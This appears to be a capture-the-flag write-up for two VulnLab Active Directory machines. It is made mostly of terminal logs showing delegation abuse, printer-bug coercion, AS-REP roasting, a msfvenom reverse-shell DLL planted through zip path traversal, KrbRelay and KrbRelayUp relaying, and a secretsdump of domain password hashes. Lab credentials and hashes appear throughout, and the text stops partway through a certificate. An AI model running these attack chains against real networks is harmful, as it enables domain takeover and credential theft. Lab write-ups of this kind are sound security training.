  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module>
    from bloodyAD import main
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module>
    from .network.config import Config, ConnectionHandler
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module>
    from bloodyAD.network.ldap import Ldap
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module>
    from msldap.client import MSLDAPClient
ModuleNotFoundError: No module named 'msldap'
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ pip3 install -r requirements.txt
Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1))
--snip--
Successfully built bloodyAD
Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD
Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ 

.

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC 
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

Using powermad & printerbug

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
                                        
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
                                        
Data: 180768 bytes of 180768 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> 

setup the listener ( waiting for connection then)

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

start printerbug

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
 addspn.py  'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'   krbrelayx.py   LICENSE      printerbug.py   venv
 bloodyAD    dnstool.py                                    lib            PetitPotam   README.md
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra

Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

use impacket-secrectsdump to get the hashes.

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ klist                                                               
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL

Valid starting       Expires              Service principal
06/12/2024 07:13:23  06/12/2024 17:07:36  krbtgt/DELEGATE.VL@DELEGATE.VL
    renew until 06/19/2024 07:07:36
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

.

What a ride.

 

vulnlab-bruno

vulnlab bruno

a hard machine

Tools used : impacket-GetNPUsers , crackmapexec , bloodhound-python , msfvenom ,  impacket-smbclient , KrbRelay.exe ,KrbRelayUp.exe , Rubeus.exe , impacket-ticketConverter , impacket-secretsdump , evil-winrm

──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-GetNPUsers bruno.vl/svc_scan -dc-ip 10.10.124.39               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate svc_scan, getting its TGT
$krb5asrep$23$svc_scan@BRUNO.VL:09ca9d7e711a56a1f32bb669a42453f7$4010b699655764a235ad95abe2edf6fd2b368f73aebb7f9fac8fd62152c57ce7d08cb2a8e028ef84323485cda101d51cb4151fc1fdb0a9773bc103647303d0401aabf77c6b4e141786fa7e8e675987b8ece6a6cb947dc7a64825da5d64aa1d4f24a0638ec7b9cc96d64a241e719126cebb8488e92c6c0a9edcdbaff4d0ba71be1c37b76d1dcc3c85f500ae573ee25e5db14fef6eab9e3c55e245c318fc5308ebd54eaa6ebaede68b11601da50cb738df8a53736ab8f5be08b099d797f95067f0741d305500a7f5762e0a088fa9b29d02092a86eef3b53aa575e916007eb089b8da462e9a
                                  
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ john svc_scan.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Sunshine1        ($krb5asrep$23$svc_scan@BRUNO.VL)     
1g 0:00:00:00 DONE 2/3 (2024-06-09 11:01) 16.66g/s 850166p/s 850166c/s 850166C/s Piano..Open
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


 

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec smb bruno.vl -u 'svc_scan' -p 'Sunshine1' --shares
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         brunodc.bruno.vl 445    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
SMB         brunodc.bruno.vl 445    BRUNODC          [+] Enumerated shares
SMB         brunodc.bruno.vl 445    BRUNODC          Share           Permissions     Remark
SMB         brunodc.bruno.vl 445    BRUNODC          -----           -----------     ------
SMB         brunodc.bruno.vl 445    BRUNODC          ADMIN$                          Remote Admin
SMB         brunodc.bruno.vl 445    BRUNODC          C$                              Default share
SMB         brunodc.bruno.vl 445    BRUNODC          CertEnroll      READ            Active Directory Certificate Services share
SMB         brunodc.bruno.vl 445    BRUNODC          IPC$            READ            Remote IPC
SMB         brunodc.bruno.vl 445    BRUNODC          NETLOGON        READ            Logon server share 
SMB         brunodc.bruno.vl 445    BRUNODC          queue           READ,WRITE      
SMB         brunodc.bruno.vl 445    BRUNODC          SYSVOL          READ            Logon server share 
                                                   

some Bloodhound Analysis

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ bloodhound-python -d bruno.vl -c all -u 'svc_scan' -p 'Sunshine1' -ns 10.10.84.244      
INFO: Found AD domain: bruno.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: brunodc.bruno.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: brunodc.bruno.vl
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: brunodc.bruno.vl
INFO: Done in 00M 05S

creating Venom & use KrbRelay

for the payload I used a msfvenom reverse shell and saved it as Microsoft.DiaSymReader.Native.amd64.dll , and created the zip file with a path traversal using 7zip ( renaming the zipped file to ../app/Microsoft.DiaSymReader.Native.amd64.dll

 

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f dll > Microsoft.DiaSymReader.Native.amd64.dll     
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-smbclient bruno/svc_net:Sunshine1@bruno.vl                                     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
IPC$
NETLOGON
queue
SYSVOL
# use queue
# rm evil3.zip
# ls
drw-rw-rw-          0  Mon Jun 10 04:15:54 2024 .
drw-rw-rw-          0  Mon Jun 10 03:39:44 2024 ..
# put Microsoft.DiaSymReader.Native.amd64.zip
# ls
drw-rw-rw-          0  Mon Jun 10 04:16:22 2024 .
drw-rw-rw-          0  Mon Jun 10 03:39:44 2024 ..
-rw-rw-rw-       1994  Mon Jun 10 04:16:22 2024 Microsoft.DiaSymReader.Native.amd64.zip
# 

 

Getting Root with Resource Based Constrained Delegation (RBCD )

i used : https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_Any/KrbRelay.exe

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.84.244] 65278
Microsoft Windows [Version 10.0.20348.768]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name      SID                                           
============== ==============================================
bruno\svc_scan S-1-5-21-1536375944-4286418366-3447278137-1104


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes                                        
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                          Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                               Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                       Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

c:\Users\svc_scan\Desktop>curl http://10.8.2.138:8000/KrbRelay.exe -o KrbRelay.exe
curl http://10.8.2.138:8000/KrbRelay.exe -o KrbRelay.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1581k  100 1581k    0     0  3664k      0 --:--:-- --:--:-- --:--:-- 3685k

c:\Users\svc_scan\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 123D-CFA3

 Directory of c:\Users\svc_scan\Desktop

06/10/2024  08:32 AM    <DIR>          .
06/29/2022  04:09 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
06/10/2024  08:32 AM         1,618,944 KrbRelay.exe
               3 File(s)      1,620,025 bytes
               2 Dir(s)  15,324,868,608 bytes free

c:\Users\svc_scan\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\svc_scan\Desktop> ./KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1116 -ssl -port 10246 -reset-password administrator Puckie71#
./KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1116 -ssl -port 10246 -reset-password administrator Puckie71#
[*] Relaying context: bruno.vl\BRUNODC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\svc_scan\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAABr15/LWcZ9/+EJA1xQswkDAsgAAAgP//9OCOsICNkdgCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 608206d506092a864886f71201020201006e8206c4308206c0a003020105a10302010ea20703050020000000a382050761820503308204ffa003020105a10a1b084252554e4f2e564ca2233021a003020102a11a30181b046c6461701b106272756e6f64632e6272756e6f2e766ca38204c5308204c1a003020112a103020105a28204b3048204af8cc26b37e0e38b4a1db375eb1dfc5df9979a82ce341d9f39834a7aa00b4baf1f8f3f662b537819fa28f4df47b783f61ae4f260c5130fadf4854efe24470e5f46ee9d78e9970bf353d8f79231b1ed3bef772cda2f804862909d51029a779978f4aa6348b1fada3c56bfa6c6f05158e221df100fbe0fa7e978d40e67237b2d19e7d2f1bb1f50e05eaa1c88ecc20ed0383f84767b9b4f4ef74038d930ac02d185a891c8e1bfc8653526cb1252d7b6b781880c3534b0f08680763e17848264e6f6fc8e1585d75d6e9d748ab9c6c79c7ced7855305ae09f722d8988a30d443fb04f354eb6b315c0eb1e1652c0be9d028b3205b855a405950507f2aecf13bf58d847f6c214015bd7aed4f185dbb6939ca39a7350f3e92bc453b39a9638518db4cc7975d3ef1f16fa444ab852bbe595ee869fc865d576a56a3222419938701402d7ebbf6145de290b620b020a42ee9ff9288583152135907f31a156ea547d86a9b1f270c9b729bf506ef5f138ae90e9930ca7b8a9ac8033ad941497fe09235621ea7fa6e2cf98e1fffe52b12073270b1dc441873e662154b22844f517fa1803ad0ca466945c0b2d3e0ecf627068126cc58b378a52f235eddbdbedad268d31d28f8156eb7451bb1ca1fb812d110058468def69b955f38867d1a8e2968c45254f9d11030365840b140508378ed0116ed05753bf6b21ab12596059418ef63716412b0e997e4ca92e49ae14cb754f7d4363279907d6aa8df88fe85d03886be0b7eae8aaeaf8c2e8904f046a3d5ddadbf6af99a63e80c6aed9ba61be77e788fcdb51baf22460e70eaf7b17487f5b95dc3b02c4ad1affd1dd0f842d8f897c1f6a2b0d9acb6114119905a119745e2461d5fd19c4934e39875f3876278e87b1fcacac31e30896cba51edb4bea0abbe467e3f398b99eee5fe85d1a00d253ac7298897dfd786aded14e479971e925da0353c1dd6e136903d56d82df2fad99298fdfc68caa0052c324cddc995270a9c064c291f14d80ea32f62e19d500cb359fd00966874747c035c8df87cd686864fd58f347880fa697abe6c74be7d8cb401694a473988ca2580bd997f0106e7bb1b127044ee9457fdfd67d9a2c95373d7d204fb9ce6c33d543a5b2cd961ccfc04075f77f8a4998faa292e83bf9a829d30006b2a40cd807bcd25e62a4605a60ce140d6986a88e2acfd87d1a907de1687ffc3d4a42aeeebf83bbf4a0c76c5132b4dd8355e7bfc4545efd92da6601f4652f8609402e29dbfbae32cc2f090b090e605928601f544637d779c96dab4fa0ebc5ae5c74d2f51206e4e28088ca7bb34e630b47198e3393bf5ae3b9ac50e31e71e9d72d65f1fe2ea6dc5921e6b2fced3c5cf6728882c33e5755514de6e33edc4193ee2690547cf6a5a4207e3a8d01a1cc616e9a30c1ee54fb035560457e4097fe4af5c4108aa66c24089d86c040e72c2f7089a8ff39203281e183ebbf03870153cd4d6b7e2bfa734b00cee9f75568824bb4843f0b2450310592690570574e0c4f5692b759949f49350cedc31ee77baf457c530e9041a9fecd3fdfd6d2a68efa659decd0b9d5551cdb250237f1e47e855240d213f5ac00271da102747176452c9a5302955639ffa8b147dde14ece807e5e9b68ce6db496fc9254114ffc53219672c28f735213166f3f47345462afbb7098a1bda8b12811839643f6fba482019e3082019aa003020112a28201910482018d1f18b17b7c36a41839b5ebf8d5d3d2eec0f8dbeab7bc34f5f0ad4aaadeeb876a91babe809b17d143e2917896fad26bbbc006981f9b411ba76d7f2679bd1a3b785305f94e6d4009026fdfdc595d8323f82bfb9f9f22c274e8ac40537c6c74f148493523c8ebb021ec9af5b3ee7c171592d497118984fbabe67a941b96e06a711de2d19caaf960dda18436af7b77311b36bdb54722ca360db88302e6e6e4a929677c07d8084a974ef8b02ad8539b662ea03fd3fba7020647c9a57d765e5f0965950211e1b4f9872a48633fd7fd7b2c85b52935d614567d146f3a9ee8ef16fc22c60043909c4c3c6466015d27e0357dae52b45268e6f23905630202ae3c97fb65ae73cdf8e81ef53c02cf8bfa14bd16f7ccb5f174be1dc10a8e74f1d5bf88379321f316d820d3f564d33cdae93300ba28e3896de759cda90db8a26e2db1f1b38b1d91e207a78fc1b5a84edad7578b4940203e25dacb6d2de28531a841eccd5152b371c7050cec21b123a259dfd0ff4938131504f06269b660f02ad3dc4b27eacb9d8e8eb0aa3eafbe6060d9b44031
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046eaaccbc427c537bd34cfaad3ccfe07faa4cc962d5d69beb23751a7b161e376ba5ef59142de74e813e06d6168ec95cde528b4740c0c81d6e44a7dcb8880cd1cfaf1f3015610a007d87ee3d682637a6d952cbbde71f8696d20c62f3e9bca547a0eb1933e366562379501f7755ad4db3
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404429d0e40f70e6a4260c81b4b46a52e91a7459b6722a628653d073e9bfa243ceb1f619595cbadaeb7191cd7e3b0b32f0c3b0d78cfe0bb84f7a77250816d2dd30e49a692
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
[*] ldap_modify: LDAP_SUCCESS
PS C:\Users\svc_scan\Desktop> 

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ evil-winrm -i bruno.vl -u 'Administrator' -p 'Puckie71#'         

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/29/2022   3:00 PM             37 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{b52<REDACTED>a7d}
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

Getting Root with Shadow Credentials (krbrelayup & rubeus)

i used : https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_Any/KrbRelayUp.exe & Rubeus.exe

Valid CLSID from : https://vulndev.io/cheats-windows/

also LDAP signing must be disabled , and we must have a Valid machineAccount quota

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        brunodc.bruno.vl 389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
LDAP-CHE... brunodc.bruno.vl 389    BRUNODC          LDAP Signing NOT Enforced!
LDAP-CHE... brunodc.bruno.vl 389    BRUNODC          Channel Binding is set to "NEVER" - Time to PWN!
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq         
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        brunodc.bruno.vl 389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
MAQ         brunodc.bruno.vl 389    BRUNODC          [*] Getting the MachineAccountQuota
MAQ         brunodc.bruno.vl 389    BRUNODC          MachineAccountQuota: 10

 

PS C:\temp> .\KrbRelayUp.exe full -m shadowcred -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m shadowcred -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM


[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] Generating certificate
[+] Certificate generated
[+] Generating KeyCredential
[+] KeyCredential generated with DeviceID 0367120a-5b1f-4343-92e6-87879f2831b7
[+] KeyCredential added successfully
[+] Certificate: MIIKSAIBAzCCCgQGCSqGSIb3DQEHAaCCCfUEggnxMIIJ7TCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcNAQwBAzAOBAiTFGuPkmWo/QICB9AEggTY8eBgHRmL6P0olkDNHsW9tEm5dTU1d1BNpxnmp149Y/z+hE4jCc1Fx2cMLrsOH+XA/+JQzCg932Y0M8qzvsZPqbfkTy69KJIl45km9+PgbTsn0qLVSqSckioUQYGbJDusOgUW8qzelOQdWIP4KW9veDXTY5lqVKypNY9Bea3SvgL4lKFzqsit+IvUCJFnVdQ6o5TX7v9ZoHe5CjLEskKgTzGtlz6H1rzcGTAhNNke+uleyCKiiS8vskvnrIq0bYjH3LkODAq1rwMgfTrrrSXuhdwTCJb1EHSegQsW4IetK1IvPPbifvcZuOI8gKqkKDAOkj/d6EXIR5YULsi0IcveleSKVBr/UQZOBAR2KtUlr47s2aLuO7nAbYPxGMyoFWo0jmjgJFOgbQIVqxBprN7dXT9FFoR6jgwbWx1dtwiXAOubGt3ELLDah2L6gQeKd2VTdc/2LXnKlvIUtCTSnhgfdER4Ak68xWt9U9zzRg97jLzwoZPvXdpdFl2Pl0rgWJQcHBLa4ydEL3faSjhj3lRjTfk1p2m1MjvQ1k9m6SASbR9EdNmeDJZCN9j5dnFVam1A3G97GVtfmILGHdrJiKQ7lhC7eQuk187kEDfn7ZwnSBCeJw8aqsTBmb3c7rzOM3VSr8bS/b3dzyPjcks7WXROpA3dvPioAi7vqo5qjXkYbEqJ800yenaSDf2s207ctrkOuKqpY/FHPl+B+StR1p+WxUm8OrlPOCCQZS5CYjD+cy17lNLwlZFjrhMEfXfNyCGoU+flUdx